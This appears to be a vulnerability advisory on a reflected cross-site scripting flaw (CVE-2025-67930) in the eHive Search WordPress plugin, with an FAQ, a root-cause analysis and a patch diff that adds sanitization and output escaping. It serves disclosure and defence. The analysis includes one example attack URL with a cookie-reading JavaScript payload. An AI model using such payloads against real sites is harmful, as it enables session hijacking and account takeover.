What is CVE-2025-67930?

CVE-2025-67930 is a reflected cross-site scripting (XSS) vulnerability found in the eHive Search plugin for WordPress, affecting versions up to and including 2.5.0. It allows unauthenticated attackers to inject arbitrary JavaScript into web pages, which can execute if a user interacts with a malicious link.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s search functionality. Attackers can craft malicious URLs containing JavaScript payloads that execute in the victim’s browser when they click on a link.

Who is affected by this vulnerability?

Any WordPress site using the eHive Search plugin version 2.5.0 or earlier is at risk. Administrators should check their plugin version to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the eHive Search plugin installed. If it is version 2.5.0 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is patched in version 2.5.1 of the eHive Search plugin. Update to this version or later to mitigate the risk of exploitation.

What does the CVSS score of 6.1 indicate?

A CVSS score of 6.1 indicates a medium severity vulnerability. This means that while it is not the most critical threat, it still poses a significant risk, especially if exploited in conjunction with other vulnerabilities.

What is the proof of concept for this vulnerability?

The proof of concept involves generating a malicious URL with a JavaScript payload in the ‘eHive_query’ parameter. When a victim visits this URL, the payload executes, demonstrating the reflected XSS vulnerability.

What steps should I take if my site is compromised?

If your site is compromised, immediately update the eHive Search plugin to the patched version. Review your site’s security logs, change passwords, and consider restoring from a clean backup.

Are there any additional security measures I should take?

In addition to updating the plugin, consider implementing a web application firewall, regularly scanning your site for vulnerabilities, and educating users about the risks of clicking on unknown links.

How can I prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, ensure all plugins and themes are regularly updated, use reputable sources for plugins, and implement security best practices such as input validation and output escaping in custom code.

Where can I find more information about this vulnerability?

More information about CVE-2025-67930 can be found on the National Vulnerability Database (NVD) and security advisories from the WordPress community.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-67930: eHive Search <= 2.5.0 – Reflected Cross-Site Scripting (ehive-search)

Q: What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, account takeover, content manipulation, or redirection to malicious sites. Attackers can execute arbitrary JavaScript in the victim’s browser context.

CVE ID CVE-2025-67930

Plugin ehive-search

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 2.5.0

Patched Version 2.5.1

Disclosed January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67930:
The eHive Search WordPress plugin version 2.5.0 and earlier contains a reflected cross-site scripting (XSS) vulnerability. This flaw exists in the plugin’s search functionality, allowing unauthenticated attackers to inject arbitrary JavaScript. The vulnerability has a CVSS score of 6.1, indicating a medium severity issue.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping for user-supplied parameters in the plugin’s search query and pagination logic. The vulnerable code resides in the main plugin file `ehive-search/EHiveSearch.php` and the template file `ehive-search/templates/eHiveSearch.php`. Specifically, the `ehive_search_shortcode` function (lines 712-762) and the template rendering functions directly echo user-controlled variables from `$_GET` parameters without proper escaping. The plugin retrieves these parameters via the `ehive_search_get_var` helper function, which accesses the `query_var` and `page_var` options defined in the plugin settings.

The exploitation method involves an attacker crafting a malicious URL containing JavaScript payloads in the search query or pagination parameters. The attack targets any WordPress page containing the `[ehive_search]` shortcode. An attacker sends a victim a link like `https://target.site/?eHive_query=alert(document.cookie)`. When the victim visits the page, the payload renders directly into the HTML search form input field and executes in the victim’s browser context. The vulnerable parameters are the custom query variables defined by the plugin’s `query_var` and `page_var` options, which default to `eHive_query` and `eHive_page`.

The patch in version 2.5.1 introduces multiple layers of defense. It adds a new `ehive_search_init` function that hooks into WordPress’s `pre_get_posts` action. This function calls `alter_post_query_var` (lines 47-57), which applies `sanitize_text_field()` to the query and page variables before they reach template rendering. The patch also modifies the `ehive_search_shortcode` function to replace the insecure `extract()` call with explicit variable assignment and applies `sanitize_text_field()` to all shortcode attributes (lines 712-752). Crucially, the template file now uses `esc_attr()`, `esc_url()`, and `esc_html()` functions for output escaping (lines 19, 25, 26, 31, 32, 53, 69, 84, 130, 141, 153, 180, 249, 257, 305, 306).

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of a victim’s browser session. This can lead to session hijacking, account takeover, content manipulation, or redirection to malicious sites. The vulnerability requires user interaction (clicking a malicious link), but no authentication is needed. Attackers can steal WordPress admin cookies, perform actions on behalf of authenticated users, or deface the site through injected content.

Differential between vulnerable and patched code

Code Diff

--- a/ehive-search/EHiveSearch.php
+++ b/ehive-search/EHiveSearch.php
@@ -4,7 +4,7 @@
 	Plugin URI: http://developers.ehive.com/wordpress-plugins/
 	Author: Vernon Systems limited
 	Description: Search and display results from eHive. The <a href="http://developers.ehive.com/wordpress-plugins#ehiveaccess" target="_blank">eHiveAccess plugin</a> must be installed.
-	Version: 2.5.0
+	Version: 2.5.1
 	Author URI: http://vernonsystems.com
 	License: GPL2+
 */
@@ -34,8 +34,8 @@
     	const CURRENT_VERSION = 4; // Increment each time an upgrade is required / options added or deleted.
     	const EHIVE_SEARCH_OPTIONS = "ehive_search_options";

-        function __construct() {
-
+        function __construct() {
+			add_action("init", array(&$this, "ehive_search_init"));
             add_action("admin_init", array(&$this, "ehive_search_admin_options_init"));
             add_action("admin_menu", array(&$this, "ehive_search_admin_menu"));

@@ -43,6 +43,22 @@
             add_shortcode('ehive_search', array(&$this, 'ehive_search_shortcode'));
         }

+		function ehive_search_init() {
+			add_action('pre_get_posts', array(&$this, 'alter_post_query_var'));
+		}
+
+		function alter_post_query_var($query) {
+			if (!is_admin() && $query->is_main_query()) {
+				$options = get_option('ehive_search_options');
+				if (isset($options['query_var'])) {
+					$query->set($options['query_var'], sanitize_text_field( $query->get($options['query_var'])));
+				}
+				if (isset($options['page_var'])) {
+					$query->set($options['page_var'], sanitize_text_field( $query->get($options['page_var'])));
+				}
+			}
+		}
+
         function ehive_search_admin_options_init(){

         	$this->ehive_plugin_update();
@@ -79,6 +95,84 @@
         }

         function ehive_search_options_validate($input) {
+
+			if(isset($input['limit'])) { $input['limit'] = sanitize_text_field($input['limit']); }
+			if(!isset($input['limit']) || $input['limit'] == "" ) {
+				$input['limit'] = "12";
+			}
+
+			// Lightbox view
+			if(isset($input['lightbox_object_number_enabled_label'])) { $input['lightbox_object_number_enabled_label'] = sanitize_text_field($input['lightbox_object_number_enabled_label']); }
+			if(isset($input['lightbox_name_enabled_label'])) { $input['lightbox_name_enabled_label'] = sanitize_text_field($input['lightbox_name_enabled_label']); }
+			if(isset($input['lightbox_primary_creator_maker_enabled_label'])) { $input['lightbox_primary_creator_maker_enabled_label'] = sanitize_text_field($input['lightbox_primary_creator_maker_enabled_label']); }
+			if(isset($input['lightbox_primary_creator_maker_role_enabled_label'])) { $input['lightbox_primary_creator_maker_role_enabled_label'] = sanitize_text_field($input['lightbox_primary_creator_maker_role_enabled_label']); }
+			if(isset($input['lightbox_taxonomic_classification_enabled'])) { $input['lightbox_taxonomic_classification_enabled'] = sanitize_text_field($input['lightbox_taxonomic_classification_enabled']); }
+			if(isset($input['lightbox_taxonomic_type_indicator_enabled'])) { $input['lightbox_taxonomic_type_indicator_enabled'] = sanitize_text_field($input['lightbox_taxonomic_type_indicator_enabled']); }
+			if(isset($input['lightbox_field_collector_enabled'])) { $input['lightbox_field_collector_enabled'] = sanitize_text_field($input['lightbox_field_collector_enabled']); }
+			if(isset($input['lightbox_web_public_description_enabled'])) { $input['lightbox_web_public_description_enabled'] = sanitize_text_field($input['lightbox_web_public_description_enabled']); }
+			if(isset($input['lightbox_date_made_enabled'])) { $input['lightbox_date_made_enabled'] = sanitize_text_field($input['lightbox_date_made_enabled']); }
+			if(isset($input['lightbox_place_made_enabled'])) { $input['lightbox_place_made_enabled'] = sanitize_text_field($input['lightbox_place_made_enabled']); }
+			if(isset($input['lightbox_object_type_enabled'])) { $input['lightbox_object_type_enabled'] = sanitize_text_field($input['lightbox_object_type_enabled']); }
+			if(isset($input['lightbox_medium_description_enabled'])) { $input['lightbox_medium_description_enabled'] = sanitize_text_field($input['lightbox_medium_description_enabled']); }
+			if(isset($input['lightbox_measurement_description_enabled'])) { $input['lightbox_measurement_description_enabled'] = sanitize_text_field($input['lightbox_measurement_description_enabled']); }
+			if(isset($input['lightbox_named_collection_enabled'])) { $input['lightbox_named_collection_enabled'] = sanitize_text_field($input['lightbox_named_collection_enabled']); }
+			if(isset($input['lightbox_credit_line_enabled'])) { $input['lightbox_credit_line_enabled'] = sanitize_text_field($input['lightbox_credit_line_enabled']); }
+
+			if(isset($input['lightbox_columns'])) { $input['lightbox_columns'] = sanitize_text_field($input['lightbox_columns']); }
+			if(!isset($input['lightbox_columns']) || $input['lightbox_columns'] == "" ) {
+				$input['lightbox_columns'] = "1";
+			}
+
+			if(isset($input['lightbox_more_link_text'])) { $input['lightbox_more_link_text'] = sanitize_text_field($input['lightbox_more_link_text']); }
+
+			if(isset($input['query_var'])) { $input['query_var'] = sanitize_text_field($input['query_var']); }
+			if(!isset($input['query_var']) || $input['query_var'] == "" ) {
+				$input['query_var'] = "eHive_query";
+			}
+
+			if(isset($input['page_var'])) { $input['page_var'] = sanitize_text_field($input['page_var']); }
+			if(!isset($input['page_var']) || $input['page_var'] == "" ) {
+				$input['page_var'] = "eHive_page";
+			}
+
+			if(isset($input['css_class'])) { $input['css_class'] = sanitize_text_field($input['css_class']); }
+
+			if(isset($input['item_background_colour'])) { $input['item_background_colour'] = sanitize_text_field($input['item_background_colour']); }
+			if(!isset($input['item_background_colour']) || $input['item_background_colour'] == "" ) {
+				$input['item_background_colour'] = "#f3f3f3";
+			}
+
+			if(isset($input['item_border_colour'])) { $input['item_border_colour'] = sanitize_text_field($input['item_border_colour']); }
+			if(!isset($input['item_border_colour']) || $input['item_border_colour'] == "" ) {
+				$input['item_border_colour'] = "#666666";
+			}
+
+			if(isset($input['item_border_width'])) { $input['item_border_width'] = sanitize_text_field($input['item_border_width']); }
+			if(!isset($input['item_border_width']) || $input['item_border_width'] == "" ) {
+				$input['item_border_width'] = "2";
+			}
+
+			if(isset($input['image_background_colour'])) { $input['image_background_colour'] = sanitize_text_field($input['image_background_colour']); }
+			if(!isset($input['image_background_colour']) || $input['image_background_colour'] == "" ) {
+				$input['image_background_colour'] = "#ffffff";
+			}
+
+			if(isset($input['image_padding'])) { $input['image_padding'] = sanitize_text_field($input['image_padding']); }
+			if(!isset($input['image_padding']) || $input['image_padding'] == "" ) {
+				$input['image_padding'] = "1";
+			}
+
+			if(isset($input['image_border_colour'])) { $input['image_border_colour'] = sanitize_text_field($input['image_border_colour']); }
+			if(!isset($input['image_border_colour']) || $input['image_border_colour'] == "" ) {
+				$input['image_border_colour'] = "#666666";
+			}
+
+			if(isset($input['image_border_width'])) { $input['image_border_width'] = sanitize_text_field($input['image_border_width']); }
+			if(!isset($input['image_border_width']) || $input['image_border_width'] == "" ) {
+				$input['image_border_width'] = "2";
+			}
+
+
         	add_settings_error('ehive_search_options', 'updated', 'eHive Search settings saved.', 'updated');

         	$input["update_version"] = self::CURRENT_VERSION; // Retain the plugin version on save of opotions.
@@ -193,9 +287,6 @@
         	add_settings_field('image_border_width', 'Image border width', array(&$this, 'image_border_width_fn'), __FILE__, 'css_inline_section');
         }

-        //
-        //	GENERAL OPTIONS SECTION
-        //
         function limit_fn() {
         	$options = get_option('ehive_search_options');
         	echo "<input class='small-text' id='limit' name='ehive_search_options[limit]' type='number' value='{$options['limit']}' />";
@@ -272,9 +363,6 @@
             }
         }

-        //
-        //	RESULTS VIEW SECTION
-        //
         function result_views_options_fn($keyValuePair) {
         	$options = get_option('ehive_search_options');

@@ -304,9 +392,6 @@
         	echo "<input ".$checked." id='show_powered_by_ehive' name='ehive_search_options[show_powered_by_ehive]' type='checkbox' />";
         }

-        //
-        //	LIST VIEW SECTION
-        //
         function list_view_options_fn($key) {
         	$options = get_option('ehive_search_options');

@@ -335,11 +420,7 @@
             }
             echo "</select>";
         }
-
-
-        //
-        //	LIGHTBOX VIEW SECTION
-        //
+
         function lightbox_columns_fn() {
         	$options = get_option('ehive_search_options');
         	echo "<input class='small-text' id='lightbox_columns' name='ehive_search_options[lightbox_columns]' type='number' value='{$options['lightbox_columns']}' />";
@@ -365,7 +446,8 @@
         	}

         	if(isset($options[$key.'_label'])){
-        	    echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='{$options[$key.'_label']}' />";
+				$labelValue = sanitize_text_field($options[$key.'_label']);
+				echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='{$labelValue}' />";
         	} else {
         	    echo "<input id='{$key}_label' name='ehive_search_options[{$key}_label]' size='40' type='text' value='' />";
         	}
@@ -390,11 +472,7 @@
             }
             echo "</select>";
         }
-
-
-        //
-        //	ADVANCED OPTIONS SECTION
-        //
+
         function query_var_fn() {
         	$options = get_option('ehive_search_options');
         	echo "<input class='medium-text' id='query_var' name='ehive_search_options[query_var]' type='text' value='{$options['query_var']}' />";
@@ -405,9 +483,6 @@
         	echo "<input class='medium-text' id='page_var' name='ehive_search_options[page_var]' type='text' value='{$options['page_var']}' />";
 		}

-		//
-		//	CSS OPTIONS SECTION
-		//
 		function css_class_fn() {
 			$options = get_option('ehive_search_options');
 			echo "<input class='medium-text' id='css_class' name='ehive_search_options[css_class]' type='text' value='{$options['css_class']}' />";
@@ -423,9 +498,6 @@
             echo "<input {$checked} id='plugin_css_enabled' name='ehive_search_options[plugin_css_enabled]' type='checkbox' />";
 		}

-		//
-		//	INLINE CSS OPTIONS SECTION
-		//
 		function item_background_colour_fn() {
 			$options = get_option('ehive_search_options');
 			$checked = '';
@@ -640,31 +712,47 @@
         	return get_option('ehive_search_options');
         }

-        public function ehive_search_shortcode($atts) {
-        	global $eHiveAccess;
+        public function ehive_search_shortcode($atts=[]) {

-        	$options = get_option('ehive_search_options');
+			$options = get_option('ehive_search_options');
+
+			$attsMerged = shortcode_atts(['css_class' 				=> array_key_exists('css_class', $options) ? sanitize_text_field($options['css_class']) : '',
+        						 'item_background_colour'			=> array_key_exists('item_background_colour', $options) ? sanitize_text_field($options['item_background_colour']) : '#f3f3f3',
+								 'item_background_colour_enabled'	=> array_key_exists('item_background_colour_enabled', $options) ? sanitize_text_field($options['item_background_colour_enabled']) : 'on',
+								 'item_border_colour'				=> array_key_exists('item_border_colour', $options) ? sanitize_text_field($options['item_border_colour']) : '#666666',
+								 'item_border_colour_enabled'		=> array_key_exists('item_border_colour_enabled', $options) ? sanitize_text_field($options['item_border_colour_enabled']) : '',
+								 'item_border_width' 				=> array_key_exists('item_border_width', $options) ? sanitize_text_field($options['item_border_width']) : '2',
+								 'image_background_colour'			=> array_key_exists('image_background_colour', $options) ? sanitize_text_field($options['image_background_colour']) : '#ffffff',
+								 'image_background_colour_enabled'	=> array_key_exists('image_background_colour_enabled', $options) ? sanitize_text_field($options['image_background_colour_enabled']) : 'on',
+								 'image_padding' 					=> array_key_exists('image_padding', $options) ? sanitize_text_field($options['image_padding']) : '1',
+								 'image_padding_enabled' 			=> array_key_exists('image_padding_enabled', $options) ? sanitize_text_field($options['image_padding_enabled']) : 'on',
+								 'image_border_colour'				=> array_key_exists('image_border_colour', $options) ? sanitize_text_field($options['image_border_colour']) : '#666666',
+								 'image_border_colour_enabled'		=> array_key_exists('image_border_colour_enabled', $options) ? sanitize_text_field($options['image_border_colour_enabled']) : 'on',
+								 'image_border_width' 				=> array_key_exists('image_border_width', $options) ? sanitize_text_field($options['image_border_width']) : '2',
+								 'sort_name'						=> array_key_exists('sort_name', $options) ? sanitize_text_field($options['sort_name']) : 'search_relevance',
+        	                	 'sort_order'						=> array_key_exists('sort_order', $options) ? sanitize_text_field($options['sort_order']) : 'asc',
+        	                	 'image_size_list'					=> array_key_exists('image_size_list', $options) ? sanitize_text_field($options['image_size_list']) : 'TS',
+        	                 	 'image_size_lightbox'				=> array_key_exists('image_size_lightbox', $options) ? sanitize_text_field($options['image_size_lightbox']) : 'S'
+        	               		],$atts, "ehive_search");
+
+			$css_class = sanitize_text_field($attsMerged['css_class']);
+			$item_background_colour  = sanitize_text_field($attsMerged['item_background_colour']);
+			$item_background_colour_enabled  = sanitize_text_field($attsMerged['item_background_colour_enabled']);
+			$item_border_colour = sanitize_text_field($attsMerged['item_border_colour']);
+			$item_border_colour_enabled  = sanitize_text_field($attsMerged['item_border_colour_enabled']);
+			$item_border_width  = sanitize_text_field($attsMerged['item_border_width']);
+			$image_background_colour  = sanitize_text_field($attsMerged['image_background_colour']);
+			$image_background_colour_enabled  = sanitize_text_field($attsMerged['image_background_colour_enabled']);
+			$image_padding  = sanitize_text_field($attsMerged['image_padding']);
+			$image_padding_enabled  = sanitize_text_field($attsMerged['image_padding_enabled']);
+			$image_border_colour = sanitize_text_field($attsMerged['image_border_colour']);
+			$image_border_colour_enabled  = sanitize_text_field($attsMerged['image_border_colour_enabled']);
+			$image_border_width  = sanitize_text_field($attsMerged['image_border_width']);
+			$sort_name = sanitize_text_field($attsMerged['sort_name']);
+			$sort_order = sanitize_text_field($attsMerged['sort_order']);
+			$image_size_list = sanitize_text_field($attsMerged['image_size_list']);
+			$image_size_lightbox = sanitize_text_field($attsMerged['image_size_lightbox']);

-        	extract(shortcode_atts(array('css_class' 						=> array_key_exists('css_class', $options) ? $options['css_class'] : '',
-        								 'item_background_colour'			=> array_key_exists('item_background_colour', $options) ? $options['item_background_colour'] : '#f3f3f3',
-										 'item_background_colour_enabled'	=> array_key_exists('item_background_colour_enabled', $options) ? $options['item_background_colour_enabled'] : 'on',
-										 'item_border_colour'				=> array_key_exists('item_border_colour', $options) ? $options['item_border_colour'] : '#666666',
-										 'item_border_colour_enabled'		=> array_key_exists('item_border_colour_enabled', $options) ? $options['item_border_colour_enabled'] : '',
-										 'item_border_width' 				=> array_key_exists('item_border_width', $options) ? $options['item_border_width'] : '2',
-										 'image_background_colour'			=> array_key_exists('image_background_colour', $options) ? $options['image_background_colour'] : '#ffffff',
-										 'image_background_colour_enabled'	=> array_key_exists('image_background_colour_enabled', $options) ? $options['image_background_colour_enabled'] : 'on',
-										 'image_padding' 					=> array_key_exists('image_padding', $options) ? $options['image_padding'] : '1',
-										 'image_padding_enabled' 			=> array_key_exists('image_padding_enabled', $options) ? $options['image_padding_enabled'] : 'on',
-										 'image_border_colour'				=> array_key_exists('image_border_colour', $options) ? $options['image_border_colour'] : '#666666',
-										 'image_border_colour_enabled'		=> array_key_exists('image_border_colour_enabled', $options) ? $options['image_border_colour_enabled'] : 'on',
-										 'image_border_width' 				=> array_key_exists('image_border_width', $options) ? $options['image_border_width'] : '2',
-
-										 'sort_name'						=> array_key_exists('sort_name', $options) ? $options['sort_name'] : 'search_relevance',
-        	                             'sort_order'						=> array_key_exists('sort_order', $options) ? $options['sort_order'] : 'asc',
-        	                             'image_size_list'					=> array_key_exists('image_size_list', $options) ? $options['image_size_list'] : 'TS',
-        	                             'image_size_lightbox'				=> array_key_exists('image_size_lightbox', $options) ? $options['image_size_lightbox'] : 'S'
-        	                            ),$atts));
-
         	$resultsViewLightboxEnabled = (isset( $options['results_view_lightbox_enabled']) && $options['results_view_lightbox_enabled'] == 'on') ? true : false;
         	$resultsViewListEnabled = (isset ($options['results_view_list_enabled']) && $options['results_view_list_enabled'] == 'on') ? true : false;
         	$resultsViewPosterboardEnabled = (isset($options['results_view_posterboard_enabled']) && $options['results_view_posterboard_enabled'] == 'on') ? true : false;
@@ -674,16 +762,25 @@

         	$queryAll = ehive_search_get_var('all', false);

-        	$query = ehive_search_get_var( $options['query_var'], false);
-
+        	$query = ehive_search_get_var( $options['query_var'], false);
+
         	$query = rawurldecode($query);
         	$query = stripslashes_deep( $query );

-            $page = ehive_search_get_var($options['page_var'], 1) - 1;
+			if (ehive_search_get_var($options['page_var'], false)) {
+				$page = ehive_search_get_var($options['page_var']);
+				$page = intVal($page);
+				$page = $page -1;
+			} else {
+				$page = 0;
+			}
+
             $offset = $page * $options['limit'];

             $a = ehive_search_get_var('a' ,false);

+			global $eHiveAccess;
+
             try {
 	            if (!$query == false || $queryAll == true) {

@@ -755,8 +852,21 @@
         }

         function query_vars($vars) {
-            $vars[] = (isset($this->options['query_var']) && $this->options['query_var'] ) ? $this->options['query_var'] : '';
-            $vars[] = (isset($this->options['page_var']) && $this->options['page_var'] ) ? $this->options['page_var'] : '';
+
+			$options = get_option(self::EHIVE_SEARCH_OPTIONS);
+
+			if (isset($options['query_var']) && $options['query_var'] !== "" ){
+				$vars[] = $options['query_var'];
+			} else {
+				$vars[] = "eHive_query";
+			}
+
+			if (isset($options['page_var']) && $options['page_var'] !== "" ){
+				$vars[] = $options['page_var'];
+			} else {
+				$vars[] = "eHive_page";
+			}
+
             return $vars;
         }

@@ -925,12 +1035,13 @@

         return get_permalink($pageId);
     }
+

     $eHiveSearch = new EHiveSearch();

     add_filter('query_vars', array(&$eHiveSearch, 'query_vars'));
 //    add_filter('rewrite_rules_array', array(&$eHiveSearch, 'add_rewrite_rules'));
-
+
     add_action('activate_ehive-search/EHiveSearch.php', array(&$eHiveSearch, 'activate'));
     add_action('deactivate_ehive-search/EHiveSearch.php', array(&$eHiveSearch, 'deactivate'));
 }
--- a/ehive-search/templates/eHiveSearch.php
+++ b/ehive-search/templates/eHiveSearch.php
@@ -19,31 +19,27 @@
 if ($css_class == "") {
 	echo '<div class="ehive-search">';
 } else {
-	echo '<div class="ehive-search '.$css_class.'">';
+	echo '<div class="ehive-search '.esc_attr($css_class).'">';
 }

 if ( isset( $options['hide_search_form_enabled']) && $options['hide_search_form_enabled'] == 'on') {

 } else {
-//if ( $options['hide_search_form_enabled'] != 'on') {
-	echo '<form class="ehive-search" name="ehive-search-form" action="'. $eHiveAccess->getSearchPageLink() .'" method="get">';
-
-		echo "<input class='ehive-query' type='text' name='". $options['query_var'] ."' value='".$query."'/>";
-
+	echo '<form class="ehive-search" name="ehive-search-form" action="'. esc_url($eHiveAccess->getSearchPageLink()) .'" method="get">';
+		echo "<input class='ehive-query' type='text' name='". esc_attr($options['query_var']) ."' value='".esc_html($query)."'/>";
 		echo '<input class="ehive-submit" type="submit" value="Search"/>';
 	echo '</form>';
 }

 if (isset($eHiveBadRequestErrorMessage)) {
-    echo "<p class='ehive-error-message ehive-account-details-error'>$eHiveBadRequestErrorMessage</p>";
+    echo "<p class='ehive-error-message ehive-account-details-error'>".esc_html($eHiveBadRequestErrorMessage)."</p>";

 } else {
     if (isset($eHiveApiErrorMessage)) {
-        echo "<p class='ehive-error-message ehive-account-details-error'>$eHiveApiErrorMessage</p>";
+        echo "<p class='ehive-error-message ehive-account-details-error'>".esc_html($eHiveApiErrorMessage)."</p>";

     } else {
-    	if (isset($objectRecordsCollection)) {
-
+    	if (isset($objectRecordsCollection)) {
     		if ($objectRecordsCollection->totalObjects > 0) {
     			echo '<div class="ehive-search-results">';
     				$view = ehive_search_get_var('view', $resultsViewDefault);
@@ -57,7 +53,13 @@
         							$pBase = ehive_search_link() . '?a='.$a.$all.'&view='.$view.'&%_%';
         							$pFormat = $options['page_var'] . '=%#%';
         							$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
-        							$pCurrent = ehive_search_get_var($options['page_var'], 1);
+
+									//$pCurrent = ehive_search_get_var($options['page_var'], 1);
+									if ( ehive_search_get_var($options['page_var'])){
+										$pCurrent = ehive_search_get_var($options['page_var']);
+									} else {
+										$pCurrent = 1;
+									}

         							echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );

@@ -67,7 +69,12 @@
         							$pBase = ehive_search_link() . '?' . $options['query_var'] . '=' .rawurlencode( $query ).$all.'&view='.$view.'&%_%';
         							$pFormat = $options['page_var'] . '=%#%';
         							$pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
-        							$pCurrent = ehive_search_get_var($options['page_var'], 1);
+
+									if ( ehive_search_get_var($options['page_var'])){
+										$pCurrent = ehive_search_get_var($options['page_var']);
+									} else {
+										$pCurrent = 1;
+									}

         							echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
         						}
@@ -77,7 +84,6 @@
         				echo '</div>';
     				}

-    				//$imageSize = "";
     				$itemInlineStyleEnabled = false;
     				$imageInlineStyleEnabled = false;
     				$itemInlineStyle = '';
@@ -113,7 +119,7 @@
     					$imageInlineStyle .= "background:$image_background_colour; ";
     					$imageInlineStyleEnabled = true;
     				}
-    				if (isset($options['image_padding_enabled']) && $options['image_padding_enabled'] == 'on') {
+    				if (isset($options['image_padding_enabled']) && $options['image_padding_enabled'] == 'on'&& $image_padding > 0) {
     					$imageInlineStyle .= "padding:{$image_padding}px; ";
     					$imageInlineStyleEnabled = true;
     				}
@@ -124,10 +130,10 @@
     				}

     				if($itemInlineStyleEnabled) {
-    					$itemInlineStyle = " style='$itemInlineStyle'";
+    					$itemInlineStyle = " style='".esc_attr($itemInlineStyle)."'";
     				}
     				if($imageInlineStyleEnabled) {
-    					$imageInlineStyle = " style='$imageInlineStyle'";
+    					$imageInlineStyle = " style='".esc_attr($imageInlineStyle)."'";
     				}

     				echo "<div class='ehive-view ehive-$view'>";
@@ -135,7 +141,7 @@
     						echo "<div class='ehive-item' $itemInlineStyle>";

     							echo '<div class="ehive-item-image-wrap">';
-    								echo '<a class="ehive-image-link" href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'">';
+    								echo '<a class="ehive-image-link" href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'">';

                                         $name = '';
                                         if (isset($objectRecord->name)) {
@@ -147,7 +153,7 @@
     									if (isset($imageMediaSet)) {
     										$mediaRow = $imageMediaSet->mediaRows[0];
     										$imageMedia = $mediaRow->getMediaByIdentifier("image_$imageSize");
-    										$imageLink = '<img class="ehive-image" src="'.$imageMedia->getMediaAttribute('url').'"' . $imageInlineStyle . ' alt="'.esc_attr($imageMedia->getMediaAttribute('title')).'" title="'.esc_attr($imageMedia->getMediaAttribute('title')).'">';
+    										$imageLink = '<img class="ehive-image" src="'.esc_url($imageMedia->getMediaAttribute('url')).'"' . $imageInlineStyle . ' alt="'.esc_attr($imageMedia->getMediaAttribute('title')).'" title="'.esc_attr($imageMedia->getMediaAttribute('title')).'">';
     									}

     									echo $imageLink;
@@ -174,7 +180,13 @@
             				    $pBase = ehive_search_link() . '?a='.$a.$all.'&view='.$view.'&%_%';
             				    $pFormat = $options['page_var'] . '=%#%';
             				    $pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
-            				    $pCurrent = ehive_search_get_var($options['page_var'], 1);
+            				    //$pCurrent = ehive_search_get_var($options['page_var'], 1);
+								if ( ehive_search_get_var($options['page_var'])){
+									$pCurrent = ehive_search_get_var($options['page_var']);
+								} else {
+									$pCurrent = 1;
+								}
+

             				    echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );

@@ -184,8 +196,13 @@
 								$pBase = ehive_search_link() . '?' . $options['query_var'] . '=' .rawurlencode( $query ).$all.'&view='.$view.'&%_%';
             				    $pFormat = $options['page_var'] . '=%#%';
             				    $pTotal = ceil($objectRecordsCollection->totalObjects / $options['limit']);
-            				    $pCurrent = ehive_search_get_var($options['page_var'], 1);
-
+            				    //$pCurrent = ehive_search_get_var($options['page_var'], 1);
+            				    if ( ehive_search_get_var($options['page_var'])){
+									$pCurrent = ehive_search_get_var($options['page_var']);
+								} else {
+									$pCurrent = 1;
+								}
+
             				    echo paginate_links( array('base' => $pBase, 'format' => $pFormat, 'total' => $pTotal, 'current' => $pCurrent) );
             				}

@@ -232,7 +249,7 @@
 			if ($view == 'lightbox') {
 				echo '<li>lightbox</li>';
 			} else {
-				echo '<li><a href="'.$link.'&view=lightbox'.'">lightbox</a></li>';
+				echo '<li><a href="'.esc_url($link).'&view=lightbox'.'">lightbox</a></li>';
 			}
 		}

@@ -240,7 +257,7 @@
 			if ($view == 'list') {
 				echo '<li>list</li>';
 			} else {
-				echo '<li><a href="'.$link.'&view=list'.'">list</a></li>';
+				echo '<li><a href="'.esc_url($link).'&view=list'.'">list</a></li>';
 			}
 		}

@@ -288,30 +305,30 @@
 			$fieldLabel = $options["lightbox_{$key}_enabled_label"];
 		}
 		if (  isset($fieldValue) && $fieldValue !='' ) {
-			echo '<p class="ehive-field ehive-identifier-'.$key.'">';
+			echo '<p class="ehive-field ehive-identifier-'.esc_attr($key).'">';
 			if (isset($fieldLabel) && $fieldLabel !='') {
-				echo '<span class="ehive-field-label">'.$fieldLabel.'</span>';
+				echo '<span class="ehive-field-label">'.esc_html($fieldLabel).'</span>';
 			}
 			if (isset($fieldValue) && $fieldValue !='') {
-				echo $fieldValue;
+				echo esc_html($fieldValue);
 			}
 			echo '</p>';
 		}
 	}
 	if (isset($options['lightbox_more_link_enabled']) && $options['lightbox_more_link_enabled'] == "on") {
-		echo '<a class="ehive-more-link" href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'">'.$options['lightbox_more_link_text'].'</a>';
+		echo '<a class="ehive-more-link" href="'.esc_url($eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId)).'">'.esc_html($options['lightbox_more_link_text']).'</a>';
 	}
 }

 function listMetadata($options, $objectRecord, $eHiveAccess, $eHiveApi) {
 	$showPublicProfileName = (isset($options['show_public_profile_name']) && $options['show_public_profile_name'] == 'on') ? true : false;
 	$showCatalogueTypeIcon = (isset($options['show_catalogue_type_icon']) && $options['show_catalogue_type_icon'] == 'on') ? true : false;
-	echo '<a href="'.$eHiveAccess->getObjectDetailsPageLink($objectRecord->objectRecordId).'"><span class="ehive-item-summary">'.listFields($options, $objectRecord).'</span></a>';
